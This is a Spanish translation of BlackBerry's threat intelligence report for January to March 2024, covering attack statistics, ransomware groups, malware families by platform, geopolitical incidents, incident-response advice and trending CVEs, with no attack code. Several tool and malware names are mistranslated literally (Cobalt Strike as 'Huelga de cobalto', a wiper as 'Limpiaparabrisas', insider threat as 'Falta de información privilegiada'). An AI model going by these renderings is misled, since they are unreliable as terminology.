Inteligencia práctica que importa
Este informe BlackBerry ofrece una revisión exhaustiva del panorama mundial de las amenazas para el periodo comprendido entre enero y marzo de 2024. Entre los aspectos más destacados del informe se incluyen:
Observamos más de 630.000 hashes maliciosos, lo que supone un aumento por minuto de más del 40% con respecto al período del informe anterior.
Más información enla sección Total Attacks This Period.
El 60% de los ataques se dirigieron contra infraestructuras críticas. De ellos, el 40% iban dirigidos al sector financiero.
Más información en Infraestructuras críticas sección.
El 56% de las CVE recibieron una calificación de 7,0 o superior (siendo 10 la más grave). Las CVE se han convertido rápidamente en armas de todo tipo de malware, especialmente ransomware e infostealers.
Más información en lasección Vulnerabilidades y exposiciones comunes.
Nueva sección sobre ransomware: Hemos incluido una nueva sección sobre los principales grupos de ransomware en todo el mundo y el ransomware más activo en este periodo de informes.
Más información en la sección Quién es quién en el ransomware.
Los informes BlackBerry® Global Threat Intelligence Reports se publican cada tres meses. Estas actualizaciones frecuentes permiten a los CISO y a otros responsables clave de la toma de decisiones mantenerse informados sobre las amenazas y los retos de ciberseguridad más recientes en sus sectores y ubicaciones geográficas.
El informe es la culminación de la investigación, el análisis y las conclusiones de nuestro equipo de Inteligencia sobre Ciberamenazas (CTI), nuestro equipo de Respuesta a Incidentes (IR) y especialistas en seguridad de nuestra división CylanceMDR™. Continúe desplazándose para obtener más información, descargar el pdf o leer el resumen ejecutivo.
Ataques totales en este periodo
Como se observará en este informe, el total de ataques no está necesariamente correlacionado con el número de hashes únicos (nuevo malware). Como ilustran las figuras 2 a 6 de las dos secciones siguientes, no todos los ataques utilizan malware único. Depende de la motivación del atacante, la complejidad del ataque y el objetivo, por ejemplo, el robo de información o el robo financiero.
BlackBerry Las soluciones de ciberseguridad detuvieron más de 3.100.000 ciberataques: esto equivale a más de 37.000 ciberataques detenidos al día.
Ataques por país
Ataques detenidos
La figura 2 muestra los cinco países en los que las soluciones de ciberseguridad de BlackBerry impidieron más ciberataques. Las organizaciones que utilizan las soluciones de BlackBerry en Estados Unidos recibieron el mayor número de intentos de ataque durante este periodo. En la región Asia-Pacífico (APAC), Japón, Corea del Sur y Australia también experimentaron un alto nivel de ataques, lo que les valió estar entre los cinco primeros. En América Latina (LATAM), los clientes de Honduras fueron objeto de numerosos ataques, lo que le valió a este país el quinto puesto de nuestra lista.
Malware único
En este periodo de notificación, BlackBerry observó un aumento de más del 40 % por minuto en nuevos hashes (malware único), en comparación con el periodo de septiembre a diciembre de 2023 (Figura 1). La figura 2 muestra los cinco países en los que las soluciones de ciberseguridad de BlackBerry registraron el mayor número de hashes de malware únicos, siendo Estados Unidos el que recibió el mayor número. Corea del Sur, Japón y Australia, en la región Asia-Pacífico, mantuvieron sus posiciones del último período de tres meses, mientras que Brasil se une a la lista como nueva entrada.
Como veremos en las próximas secciones, otros atacantes pueden querer dañar la infraestructura física, como un servicio público, explotando una vulnerabilidad en los sistemas de control o infectando un dispositivo en la red
Ataques por sector
Como en nuestro informe anterior, hemos consolidado varios sectores industriales clave en dos secciones paraguas: Infraestructuras críticas y Empresas comerciales.
Las infraestructuras críticas, según la definición de la Agencia de Ciberseguridad y Seguridad de las Infraestructuras (CISA), abarcan 16 sectores, entre ellos la sanidad, la administración pública, la energía, la agricultura, las finanzas y la defensa.
La creciente digitalización de estos sectores significa que sus activos son más vulnerables a los ciberdelincuentes. Los actores de las amenazas explotan activamente los sistemas críticos a través de vulnerabilidades como las desconfiguraciones del sistema y las campañas de ingeniería social contra los empleados.
Entre las empresas comerciales se incluyen las manufactureras, las de bienes de equipo, las de servicios comerciales y profesionales y las minoristas. Las empresas son siempre objetivos tentadores para los ciberataques, y el aumento del uso de dispositivos conectados y computación en la nube ha facilitado la violación de sus sistemas. Los atacantes también se han vuelto más sofisticados, a menudo utilizando la ingeniería social para obtener credenciales de cuentas y distribuir malware.
Ciberhistoria destacada: Bancos internacionales
AllaKore RAT ataca a bancos mexicanos y plataformas de criptomonedas
En enero, los analistas de ciberamenazas de BlackBerry descubrieron una campaña de larga duración y motivación financiera dirigida a bancos mexicanos y plataformas de comercio de criptomonedas con la RAT AllaKore, una herramienta de acceso remoto de código abierto modificada. Los actores de la amenaza utilizaron señuelos que imitaban al Instituto Mexicano del Seguro Social (IMSS) y documentos legítimos para distraer a los usuarios durante el proceso de instalación, lo que les permitió robar credenciales bancarias e información de autenticación. Esta campaña ha estado en curso desde 2021, centrándose en grandes empresas mexicanas con ingresos superiores a 100 millones de dólares. BlackBerry Los resultados de la investigación sugieren que es probable que el actor de la amenaza tenga su base en América Latina, dado el uso de las IP de México Starlink y las instrucciones en español en la carga útil de la RAT. Lea el artículo completo en nuestro blog para obtener más información.
Amenazas para las infraestructuras críticas
Según nuestra telemetría interna, de los ciberataques específicos del sector a los que se enfrentaron las soluciones de ciberseguridad de BlackBerry , el 60% iban dirigidos contra infraestructuras críticas. Además, el 32% de los hashes únicos de malware iban dirigidos a inquilinos de infraestructuras críticas.
CylanceENDPOINT™ y otras soluciones de ciberseguridad de BlackBerry detuvieron más de 1,1 millones de ataques contra sectores industriales críticos, entre los que se incluyen las finanzas, la sanidad, la administración pública y los servicios públicos. Casi la mitad de estos 1,1 millones de ataques se produjeron en el sector financiero. Además, las organizaciones gubernamentales y del sector público experimentaron la mayor diversidad de ataques, con más del 36% de los hashes únicos dirigidos a este sector.
BlackBerry La telemetría registró varias familias de malware dirigidas a infraestructuras críticas en todo el mundo. Por ejemplo, se observó que el conocido infostealer LummaStealer se dirigía específicamente a las industrias alimentaria y agrícola de América Latina y al sector energético de la región APAC. Entre las amenazas más destacadas observadas durante este periodo se incluyen:
- ransomware 8Base: Operación ransomware | Sector sanitario
- Amadey (Amadey Bot): Botnet multifuncional | Instalaciones gubernamentales
- Buhti: Operación ransomware | Inmuebles comerciales
- LummaStealer (LummaC2): Infostealer basado en C | Sector agroalimentario (LATAM) y energético (APAC)
- PrivateLoader: Familia de descargadores | Sector energético
- Remcos (RemcosRAT): Herramienta de acceso remoto (RAT) comercial | Sector agroalimentario
- Vidar (VidarStealer): Infostealer de materias primas | Varios sectores:
- El sector energético en los países de APAC
- El sector de las TI en los países de LATAM
- El sector de los servicios financieros en Norteamérica
- El sector de las instalaciones gubernamentales en Europa, Oriente Medio y África (EMEA)
En el Apéndice se ofrecen detalles sobre estas amenazas a las infraestructuras críticas.
Amenazas externas a las que se enfrentan las infraestructuras críticas
Las amenazas externas son ciberataques registrados fuera de la telemetría interna de BlackBerry. Durante el último periodo de referencia, el panorama global de amenazas fue testigo de una serie de notables ataques contra infraestructuras críticas.
Continúan las repercusiones de la brecha de finales de 2023 en el Laboratorio Nacional de Idaho (INL), un centro de investigación del Departamento de Energía de Estados Unidos (DOE). Los atacantes vulneraron la plataforma de gestión de recursos humanos en la nube Oracle HCM del laboratorio y desviaron los datos personales de más de 45.000 personas. El grupo de hacktivistas SiegedSec reivindicó la autoría del ataque en las semanas siguientes y publicó parte de los datos robados en un foro de filtraciones en línea. El gráfico 7 presenta una cronología de las amenazas más destacadas contra infraestructuras críticas ocurridas durante el periodo cubierto por este informe.
Ciberhistoria destacada: Infraestructura, VPN y confianza cero
Una directiva de emergencia revela que puede haber llegado el momento de sustituir las VPN
La funcionalidad básica de las redes privadas virtuales (VPN) ha permanecido prácticamente inalterada desde su creación en 1996, pero las recientes brechas de seguridad de gran repercusión y las directivas gubernamentales sugieren que puede haber llegado el momento de reconsiderar su uso.
Un problema clave es el modelo "confiar pero verificar" de las VPN, que intrínsecamente otorga confianza a los usuarios dentro del perímetro de la red, lo que las hace vulnerables a los ciberataques. Destacando este riesgo, la Agencia de Ciberseguridad y Seguridad de las Infraestructuras (CISA) publicó recientemente directivas de emergencia que abordan las vulnerabilidades críticas de las VPN, instando a la desconexión rápida de los productos en riesgo. Lea la historia completa en nuestro blog.
Amenazas para las empresas comerciales
Al igual que las industrias se ven afectadas por las amenazas a la ciberseguridad, las empresas individuales también luchan contra los ciberataques, especialmente porque tienden a depender más de la infraestructura digital para las finanzas, las comunicaciones, las ventas, las adquisiciones y otras operaciones comerciales. Desde las empresas de nueva creación hasta los conglomerados multinacionales son susceptibles de sufrir ciberamenazas, especialmente el ransomware.
A lo largo del último periodo de referencia, las soluciones de ciberseguridad de BlackBerry bloquearon 700.000 ataques dirigidos a industrias del sector de las empresas comerciales.
Según nuestra telemetría interna, en comparación con el periodo del informe anterior, las empresas comerciales vieron:
- un aumento del dos por ciento en el número de ataques a los que se enfrentaron.
- un aumento del 10% en los hashes únicos encontrados.
Las empresas comerciales se enfrentan a amenazas de infosecuestradores que se venden a través de operaciones de malware como servicio (MaaS). A menudo, estas amenazas despliegan malware adicional en el dispositivo de la víctima. Siguen evolucionando en una carrera armamentística cibernética para eludir los productos de seguridad y el software antivirus (AV) tradicional. Entre los programas maliciosos más frecuentes observados en la telemetría de BlackBerry se encuentran:
- RedLine (RedLine Stealer): Infostealer
- SmokeLoader: Malware muy utilizado y versátil
- PrivateLoader: Facilitador de malware
- RaccoonStealer: MaaS infostealer
- LummaStealer (LummaC2): Infostealer de malware
En el Apéndice se ofrecen detalles sobre estas amenazas para las empresas comerciales.
Amenazas externas a las que se enfrenta la empresa comercial
El ransomware es un azote frecuente contra organizaciones de todos los tamaños y orientaciones empresariales. Algunos ejemplos recientes de ataques de ransomware son:
- VF Corporation -fabricante estadounidense de conocidas marcas de ropa deportiva como Timberland, The North Face y Vans- fue víctima de un ataque de ransomware por parte de la banda de ransomware ALPHV en diciembre de 2023. Los atacantes robaron los datos de más de 35 millones de clientes, causando retrasos en el cumplimiento de los pedidos y otras interrupciones durante la importante temporada de vacaciones.
- Coop Värmland, una cadena de supermercados sueca, vio interrumpido su ajetreado periodo vacacional por un ataque de ransomware perpetrado por la banda de ransomware Cactus.
- Un conocido fabricante alemán, ThyssenKrupp, sufrió una brecha en su subdivisión de automoción en febrero de 2024. La empresa dijo más tarde que se trataba de un ataque fallido de ransomware.
- En marzo, el grupo de ransomware Stormous atacó la cervecera belga Duvel Moortgat, productora de más de 20 marcas de cerveza, y robó 88 GB de datos.
Quién es quién en el ransomware
Como ponen de relieve los sucesos mencionados, el ransomware ha sido una amenaza prevalente en todo elinforme BlackBerry Global Threat Intelligence Report. Para este informe, hemos introducido una sección específica sobre los grupos de ransomware activos en este periodo.
El ransomware es una herramienta universal adoptada tanto por los ciberdelincuentes como por los sindicatos organizados, que atacan a víctimas de todos los sectores en todo el mundo. La mayoría de estos grupos tienen una motivación económica; adaptan rápidamente nuevas tácticas y técnicas para evadir las defensas tradicionales de ciberseguridad y explotan con rapidez cualquier nueva vulnerabilidad de seguridad.
El ransomware se dirige cada vez más a las organizaciones sanitarias, una tendencia preocupante. La sanidad es un sector rentable para los grupos de ransomware debido a la creciente digitalización de los registros sanitarios y a las graves consecuencias que puede tener la interrupción de estos servicios. Con ataques notables en todo el mundo durante este periodo, estos agresivos grupos pueden poner en peligro vidas y restringir o cortar el acceso de los trabajadores sanitarios a datos cruciales de información personal identificable (IPI) de los pacientes.
Los ataques a la asistencia sanitaria pueden tener graves repercusiones, paralizando hospitales, clínicas, farmacias y dispensarios de medicamentos, impidiendo que los pacientes obtengan medicamentos vitales, provocando el desvío de ambulancias y alterando la programación de procedimientos médicos. Las consecuencias secundarias incluyen la fuga de datos y la venta de información confidencial de los pacientes en la red oscura. Por este motivo, prevemos que la sanidad seguirá siendo un objetivo importante tanto a nivel público como privado a lo largo de 2024.
Protagonistas clave del ransomware durante el periodo del informe
A continuación se enumeran los principales grupos de amenazas de ransomware de todo el mundo que han estado activos durante este periodo:
Hunters International
Hunters International, un sindicato del crimen de ransomware como servicio (RaaS) que lleva operando desde finales de 2023, saltó a la fama a principios de 2024. El grupo es posiblemente una escisión del grupo de ransomware Hive, que fue eliminado por las fuerzas de seguridad a principios de 2023. Este grupo emplea un doble esquema de extorsión que consiste en cifrar primero los datos de la víctima a cambio de un rescate y, a continuación, exigir más dinero amenazando con publicar los datos robados. Hunters International opera actualmente en todo el mundo.
8Base
Observado inicialmente en 2022, el grupo de ransomware 8Base saltó a la fama a finales de 2023. Este prolífico grupo utiliza diversas tácticas, técnicas y procedimientos (TTP) y puede ser muy oportunista. El grupo suele explotar rápidamente las vulnerabilidades recién descubiertas y aprovecha varios ransomware, incluido Phobos.
LockBit
LockBit, un grupo de ransomware con sede en Rusia, se especializa en proporcionar RaaS a través de su malware homónimo. Descubierto en 2020, el ransomware LockBit se ha convertido en uno de los grupos de ransomware más agresivos. Entre sus aspectos se incluyen:
- Herramientas personalizadas para filtrar los datos de la víctima antes de cifrarlos y alojarlos en un sitio de filtración en la web oscura.
- Se dirige principalmente a víctimas de Norteamérica y, en segundo lugar, de Latinoamérica.
- Emplea una doble estrategia de extorsión.
En febrero de 2024, la Operación Cronos, un esfuerzo internacional de las fuerzas de seguridad, interrumpió las operaciones de LockBit. Sin embargo, LockBit parece haberse recuperado desde entonces y sigue siendo un actor importante en el ámbito del ransomware.
Play
Observado inicialmente en 2022, Play es un grupo de ransomware de extorsión múltiple que aloja los datos robados en sitios basados en TOR que permiten la comunicación anónima, amenazando con que los datos se filtrarán si no se paga el rescate. Play suele dirigirse a pequeñas y medianas empresas (PYMES), principalmente en Norteamérica, pero también en la región EMEA durante el periodo de este informe. El grupo utiliza principalmente herramientas estándar como Cobalt Strike, Empire y Mimikatz para el descubrimiento y las TTP de movimiento lateral. El grupo también utilizó Grixba, una herramienta personalizada de reconocimiento y robo de información que se utiliza antes de la ejecución del ransomware.
BianLian
BianLian es un ransomware basado en GoLang que lleva activo desde 2022. El grupo asociado ha estado activo durante este periodo, atacando principalmente a víctimas de Norteamérica. Al igual que muchos grupos de ransomware, BianLian aprovecha en gran medida las vulnerabilidades reveladas recientemente, a menudo dirigidas a pequeñas empresas de diversos sectores. Utiliza varias herramientas estándar, como PingCastle, Advance Port Scanner y SharpShares, para introducirse en el sistema objetivo antes de extraer datos confidenciales y ejecutar el ransomware. Estos datos robados se utilizan como táctica de extorsión hasta que se paga el rescate.
ALPHV
A menudo conocido como BlackCat o Noberus, ALPHV es una operación RaaS que ha estado presente desde finales de 2021. El grupo que está detrás de ALPHV es muy sofisticado y utiliza el lenguaje de programación Rust para atacar sistemas operativos basados en Windows, Linux y VMWare. ALPHV suele atacar a víctimas norteamericanas.
Los grupos de ransomware... adaptan rápidamente nuevas tácticas y técnicas para eludir las defensas tradicionales de ciberseguridad y explotan con rapidez cualquier nueva vulnerabilidad de seguridad.
Ciberhistoria destacada: El ransomware y la sanidad
12 días sin ingresos: El ransomware sigue afectando al sector sanitario
En marzo, el sector sanitario sufrió un ataque de ransomware "sin precedentes" que interrumpió las operaciones en hospitales y farmacias, según la Asociación Americana de Hospitales (AHA). El ataque a Change Healthcare, que procesa 15.000 millones de transacciones sanitarias al año, afectó gravemente a servicios de atención al paciente como el apoyo a la toma de decisiones clínicas y las operaciones de farmacia. Esta perturbación provocó la paralización de los ingresos de las consultas médicas afectadas durante 12 días y dejó a los pacientes con dificultades para acceder a recetas vitales. Ahora que la Oficina de Derechos Civiles del Departamento de Salud y Servicios Humanos de Estados Unidos está investigando el caso, los últimos datos revelan un aumento significativo de las ciberamenazas, con un incremento del 256% en las grandes brechas de piratería en los últimos cinco años. El incidente subraya la necesidad crítica de mejorar las medidas de ciberseguridad en el sector sanitario. Para un análisis detallado de este problema acuciante, lea el artículo completo en nuestro blog.
Análisis y comentarios geopolíticos
Los conflictos geopolíticos impulsan cada vez más los ciberataques. Las tecnologías digitales pueden ser poderosas herramientas para el bien, pero también pueden ser objeto de abuso por parte de agentes estatales y no estatales. En los tres primeros meses de 2024, legisladores de toda Europa, Norteamérica y la región Asia-Pacífico fueron víctimas de campañas de spyware selectivas. Las amenazas penetraron en los sistemas informáticos de varios departamentos gubernamentales, comprometieron sistemas militares e interrumpieron infraestructuras críticas en todo el mundo.
Aunque los motivos que impulsan estas intrusiones son a menudo complejos y opacos, los incidentes recientes más significativos afectan a grandes divisiones geopolíticas, como la invasión rusa de Ucrania, la creciente agresión entre Israel e Irán y las actuales tensiones en el Mar de China Meridional y la región Indo-Pacífica.
En Ucrania, las dimensiones cibernéticas de la guerra siguen recrudeciéndose. En contra de las normas internacionales que rigen la conducta legal en el ciberespacio, los ataques lanzados contra Ucrania siguen sin distinguir entre infraestructuras civiles y militares. En enero, agentes rusos intervinieron cámaras web residenciales en Kiev supuestamente para recabar información sobre los sistemas de defensa antiaérea de la ciudad antes de lanzar un ataque con misiles contra ella. Según los informes, los atacantes manipularon los ángulos de las cámaras para recabar información sobre las infraestructuras críticas cercanas y así poder apuntar con mayor precisión los misiles.
También se vinculó a ciberamenazas rusas con un ataque contra el mayor proveedor de telefonía móvil de Ucrania, Kyivstar, que destruyó una importante infraestructura y cortó el acceso a 24 millones de clientes ucranianos. Este ataque se produjo pocas horas antes de que el Presidente Biden se reuniera con el Presidente Zelenskyy en Washington D.C. Los legisladores de la UE también descubrieron que sus teléfonos habían sido infectados con programas espía. Muchos de estos legisladores eran miembros de la subcomisión de seguridad y defensa del Parlamento Europeo, encargada de hacer recomendaciones sobre el apoyo de la UE a Ucrania. En marzo, atacantes rusos interceptaron también conversaciones entre militares alemanes sobre un posible apoyo militar a Ucrania, lo que refuerza la necesidad de proteger las comunicaciones frente a los crecientes intentos de espionaje.
A medida que se ha intensificado la actividad militar entre Irán e Israel, también lo han hecho los ciberataques contra sitios del gobierno israelí. En represalia, los actores de amenazas israelíes interrumpieron el 70% de las gasolineras de Irán. Mientras tanto, Estados Unidos lanzó un ciberataque contra un barco espía militar iraní en el Mar Rojo que estaba compartiendo información de inteligencia con los rebeldes Houthi.
En la región Indo-Pacífica siguieron aumentando los ciberataques y las campañas de espionaje atribuidos a grupos respaldados por China. La Junta de Revisión de Seguridad Cibernética del Departamento de Seguridad Nacional de Estados Unidos publicó un importante informe sobre el incidente Microsoft Online Exchange del verano de 2023 y documentó en detalle cómo atacantes respaldados por China robaron código fuente de Microsoft. El grupo de amenazas Storm-0558 comprometió a empleados y funcionarios del Departamento de Estado de EE.UU., el Departamento de Comercio de EE.UU., la Cámara de Representantes de EE.UU. y varios departamentos gubernamentales del Reino Unido. Según el informe, el autor de la amenaza consiguió descargar aproximadamente 60.000 correos electrónicos sólo del Departamento de Estado.
No se trataba de un incidente aislado. En marzo de 2024, el Departamento de Justicia de Estados Unidos y el FBI revelaron que atacantes chinos habían atacado a varios miembros del Reino Unido, la UE, Estados Unidos y Canadá de la Alianza Interparlamentaria sobre China.
Como ya se ha señalado, han aumentado los ataques contra infraestructuras críticas, especialmente en los sectores financiero y sanitario. En los tres primeros meses de 2024, una violación masiva de los datos de una compañía francesa de seguros médicos provocó la filtración de información personal sensible. En Canadá, el Centro de Análisis de Transacciones e Informes Financieros (FINTRAC) cerró sus sistemas tras un incidente cibernético. En respuesta, el gobierno canadiense asignó 27 millones de dólares canadienses para mejorar la resistencia cibernética de FINTRAC y construir salvaguardias de seguridad de datos.
Gobiernos de todo el mundo están invirtiendo en reforzar la ciberseguridad ante el aumento del ciberespionaje y los intentos de ciberataque. Canadá anunció recientemente niveles históricos de inversión en sus ciberdefensas, y el Reino Unido aumentó su gasto en defensa hasta el 2,5% del PIB. La ciberseguridad sigue siendo uno de los principales riesgos tanto para los gobiernos como para los agentes del sector privado, y es probable que esta tendencia continúe mientras sigan aumentando las tensiones geopolíticas.
Observaciones sobre la respuesta a incidentes
Observaciones del equipo de respuesta a incidentes de BlackBerry
Este es un resumen de los tipos de compromisos de IR a los que el equipo de BlackBerry respondió, así como las medidas de seguridad que las organizaciones pueden tomar para prevenir tales infracciones.
- Intrusión en la red: Incidentes en los que el vector de infección inicial fue un sistema vulnerable, orientado a Internet, como un servidor web o un dispositivo de red privada virtual (VPN). En algunos casos, la brecha condujo al despliegue de ransomware en el entorno del objetivo y a la filtración de datos.
- Prevención: Aplique oportunamente actualizaciones de seguridad a todos los sistemas expuestos a Internet. (MITRE - Servicios remotos externos, T1133.)
- Falta de información privilegiada: Un empleado actual y/o anterior accedió a recursos de la empresa sin autorización.
- Prevención: Implantar controles de seguridad de autenticación fuertes en todos los sistemas. Implantar procedimientos formales de baja de los empleados de la empresa. (MITRE - Cuentas válidas: Cuentas en la nube, T1078.004.)
- Ransomware: El 10% de todos los incidentes atendidos se debieron a ransomware.
- Prevención: Parchee a tiempo los servicios orientados a Internet, como el correo electrónico, las VPN y los servidores web. Esto puede impedir que un agente de amenazas acceda a los objetivos y actúe en consecuencia, como desplegar ransomware, tras obtener acceso a una red empresarial a través de un dispositivo o sistema vulnerable. (MITRE - Servicios remotos externos, T1133.)
- Prevención: Asegúrese de que la organización tiene dos copias de todos los datos críticos almacenados en dos formatos de medios diferentes de la fuente de datos original, con al menos una copia fuera del sitio.
Detectar, contener y recuperarse de un incidente de ciberseguridad requiere una rápida detección y respuesta para limitar los daños. Es imperativo que las organizaciones cuenten con un plan de respuesta a incidentes bien documentado, junto con personal capacitado y recursos listos para tomar medidas inmediatas ante los primeros indicios de una posible brecha. Esto garantiza que los equipos de seguridad puedan detectar los problemas lo antes posible, contener y erradicar rápidamente las amenazas y mitigar los impactos en la reputación de la empresa y la marca, las pérdidas monetarias y los riesgos legales para la organización.
Actores de la amenaza y herramientas
Actores de la amenaza
Decenas de grupos de amenazas lanzaron ciberataques en los tres primeros meses de 2024. Aquí destacamos los ataques más impactantes.
LockBit
En febrero, la NCA, el FBI y Europol, a través de un esfuerzo global coordinado denominado "Operación Cronos", colaboraron con las fuerzas del orden de 10 países para tomar el control de la infraestructura y el sitio de filtraciones del grupo LockBit, recopilar información de sus servidores, efectuar detenciones e imponer sanciones.
Sin embargo, menos de una semana después, el grupo de ransomware se reagrupó y reanudó sus ataques, empleando encriptadores actualizados y notas de rescate que dirigen a las víctimas a nuevos servidores tras la interrupción de las fuerzas de seguridad.
LockBit reivindicó la autor ía de ciberataques contra varias redes, incluida la red hospitalaria Capital Health. En ambos casos, amenazaron con divulgar datos confidenciales a menos que se pagara un rescate rápido.
Rhysida
APT29
CISA advirtió recientemente que APT29 ha ampliado sus objetivos para incluir industrias adicionales y más gobiernos locales. Conocido por utilizar una amplia gama de malware personalizado, el grupo de amenazas también ha atacado recientemente servicios en la nube utilizando cuentas de servicio comprometidas o tokens de autenticación robados.
En este periodo, se observó que APT29 accedía a una cuenta de prueba de Microsoft tras un ataque de pulverización de contraseñas y, a continuación, creaba aplicaciones OAuth maliciosas para acceder a cuentas de correo electrónico corporativas. Además, atacaron partidos políticos alemanes con WINELOADER, un backdoor observado por primera vez en enero de 2024.
Akira
Se sabe que Akira utiliza herramientas como:
- AdFind para consultar Active Directory.
- Mimikatz y LaZagne para acceder a las credenciales.
- Ngrok para acceder por túnel a redes detrás de cortafuegos u otras medidas de seguridad.
- AnyDesk para acceso remoto.
- Escáner IP avanzado para localizar dispositivos en una red.
Herramientas clave utilizadas por los actores de la amenaza
Mimikatz
Huelga de cobalto
Ngrok
ConnectWise
Amenazas más frecuentes por plataforma: Windows
Remcos
Troyano de acceso remoto
Remcos, abreviatura de Control Remoto y Vigilancia, es una aplicación utilizada para acceder de forma remota al dispositivo de una víctima.
Agente Tesla
Infostealer
Agent Tesla es un troyano basado en .NET que a menudo se vende como MaaS y se utiliza principalmente para la recolección de credenciales.
RedLine
Infostealer
El malware RedLine utiliza una amplia gama de aplicaciones y servicios para extraer ilícitamente datos de las víctimas, como información de tarjetas de crédito, contraseñas y cookies.
RisePro
Infostealer
Si bien en nuestro último informe se observaron variaciones actualizadas de RisePro, durante el periodo de este informe se vio al infosecuestrador en una nueva campaña que se distribuía falsamente como "software crackeado" en repositorios de GitHub.
Cargador de humo
Puerta trasera
SmokeLoader es un malware modular utilizado para descargar otras cargas útiles y robar información. Se observó originalmente en 2011, pero sigue siendo una amenaza activa a día de hoy.
Prometei
Minero de criptomonedas/Botnet
Prometei es una red de bots de criptomonedas multiplataforma que se dirige principalmente a las monedas Monero. Puede ajustar su carga útil para atacar plataformas Linux o Windows. Prometei se ha utilizado junto con Mimikatz para propagarse al mayor número posible de puntos finales.
Buhti
ransomware
Buhti es una operación de ransomware que utiliza variaciones existentes de otros programas maliciosos como LockBit o Babuk para atacar sistemas Linux y Windows.
Amenazas más frecuentes por plataforma: Linux
XMRig
Minero de criptomonedas
XMRig sigue siendo frecuente durante este periodo. El minero se dirige a Monero y permite al actor de la amenaza utilizar el sistema de la víctima para minar criptomoneda sin su conocimiento.
NoaBot/Mirai
Denegación de servicio distribuida (DDoS)
NoaBot es una variante de Mirai ligeramente más sofisticada. Cuenta con técnicas de ofuscación mejoradas en comparación con Mirai y utiliza SSH para propagarse en lugar de Telnet. También se compila con uClibc en lugar de GCC, lo que dificulta su detección.NoaBot/Mirai
XorDDoS
DDoS
XorDDoS, observado con frecuencia en nuestra telemetría, es un troyano malicioso que ataca dispositivos con Linux conectados a Internet y coordina redes de bots infectadas mediante instrucciones C2. Su nombre se debe a que utiliza el cifrado XOR para controlar el acceso a los datos de ejecución y comunicación.
AcidPour
Limpiaparabrisas
Aunque no está presente en nuestra telemetría, se ha visto una nueva versión del limpiador de datos AcidPour. La última versión del malware, que se utiliza para borrar archivos en routers y módems, está diseñada específicamente para dispositivos Linux x86.
Amenazas más frecuentes por plataforma: MacOS
RustPuerta
Puerta trasera
RustDoor es un malware de puerta trasera basado en Rust que se distribuye principalmente disfrazado de actualizaciones de programas legítimos. El malware se propaga como binarios FAT que contienen archivos Mach-o.
Robo atómico
Infostealer
Atomic Stealer (AMOS) sigue siendo frecuente con una nueva versión detectada en la naturaleza. La última versión del ladrón incluye un script en Python para pasar desapercibido. El objetivo de AMOS son las contraseñas, las cookies del navegador, los datos de autorrelleno, las carteras de criptomonedas y los datos del llavero de Mac.
Traslado Empire
Infostealer
Un infostealer descubierto por Moonlock Lab en febrero de 2024. Puede "autodestruirse" cuando detecta que se está ejecutando en un entorno virtual. Esto ayuda al malware a pasar desapercibido y dificulta el análisis por parte de los defensores. Empire Transfer se centra en contraseñas, cookies de navegador y monederos de criptomonedas, y utiliza tácticas similares a las de Atomic Stealer (AMOS).
Amenazas más frecuentes por plataforma: Android
SpyNote
Infostealer/RAT
SpyNote utiliza el Servicio de Accesibilidad de Android para capturar los datos del usuario y enviar los datos capturados a un servidor C2.
Anatsa/Teabot
Infostealer
Se distribuye principalmente a través de la tienda Google Play como aplicación troyana. Tras la infección inicial desde la aplicación troyana, Anatsa descarga archivos maliciosos adicionales en el dispositivo de la víctima desde un servidor C2.
Vultur
Infostealer/RAT
Descubierto por primera vez en 2021, Vultur se ha distribuido a través de aplicaciones troyanas y técnicas de ingeniería social "smishing" (SMS phishing). Además de la exfiltración de datos, un actor de amenaza también puede realizar cambios en el sistema de archivos, modificar los permisos de ejecución y controlar el dispositivo infectado mediante los servicios de accesibilidad de Android.
Coper/Octo
Infostealer/RAT
Una variante de la familia Exobot. Empaquetado como un producto MaaS, sus capacidades incluyen keylogging, monitorización de SMS, control de pantalla, acceso remoto y operación C2.
Vulnerabilidades y exposiciones comunes
Las vulnerabilidades y exposiciones comunes (CVE) proporcionan un marco para identificar, estandarizar y hacer públicas las vulnerabilidades y exposiciones de seguridad conocidas. Como ya se ha mencionado, los ciberdelincuentes utilizan cada vez más los CVE para vulnerar sistemas y robar datos. En este periodo, las nuevas vulnerabilidades encontradas en los productos Ivanti, ConnectWise, Fortra y Jenkins ofrecieron a los ciberdelincuentes nuevas formas de atacar a sus víctimas. Además, en los últimos meses se han puesto de manifiesto los riesgos de ataques a la cadena de suministro que podrían estar presentes en proyectos de código abierto con la puerta trasera XZ, que se había plantado intencionadamente en XZ Utils, una utilidad de compresión de datos disponible en casi todas las instalaciones de Linux.
Entre enero y marzo, el Instituto Nacional de Normas y Tecnología (NIST) notificó casi 8.900 nuevos CVE . La puntuación base se compone de métricas cuidadosamente calculadas que pueden utilizarse para calcular una puntuación de gravedad de cero a diez. La puntuación básica de CVE dominante fue un "7", que representó el 26% de las puntuaciones totales. Se trata de un aumento del tres por ciento para esta puntuación CVE en comparación con el último período de notificación. En lo que va de año, marzo ostenta el récord de CVE descubiertos recientemente, con cerca de 3.350 nuevos CVE. La tabla Trending CVEs hace referencia a vulnerabilidades específicas incluidas en la Base de Datos Nacional de Vulnerabilidades del NIST.
CVE de tendencia
XZ Utils Puerta Trasera
CVE-2024-3094 (10 crítico)
Acceso no autorizado
Este código malicioso estaba incrustado en las versiones 5.6.0 y 5.6.1 de XZ Utils. La puerta trasera manipulaba sshd, lo que otorgaba a atacantes no autenticados acceso no autorizado a las distribuciones de Linux afectadas.
Vulnerabilidades de día cero en Ivanti
CVE-2024-21887 (9.1 Crítico); CVE-2023-46805 (8.2 Alto); CVE-2024-21888 (8.8 Alto); CVE-2024-21893 (8.2 Alto)
Ejecución arbitraria de código
A principios de este año, se detectaron vulnerabilidades de elusión de autenticación e inyección de comandos en los productos Ivanti Connect Secure (9.x, 22.x) e Ivanti Policy Secure (9.x, 22.x). Si ambos fueran utilizados conjuntamente por un actor de amenazas, esto les permitiría crear peticiones maliciosas y ejecutar comandos arbitrarios en el sistema.
En enero, Ivanti también advirtió de otras dos vulnerabilidades que afectaban a los productos, CVE-2024-21888 (una vulnerabilidad de escalada de privilegios) y CVE-2024-21893 (una vulnerabilidad de falsificación de peticiones del lado del servidor). Agentes estatales han aprovechado estas vulnerabilidades de día cero para desplegar cepas de malware personalizadas.
Anulación de Windows SmartScreen
CVE-2024-21412 (8.1 Alta)
Anulación de seguridad
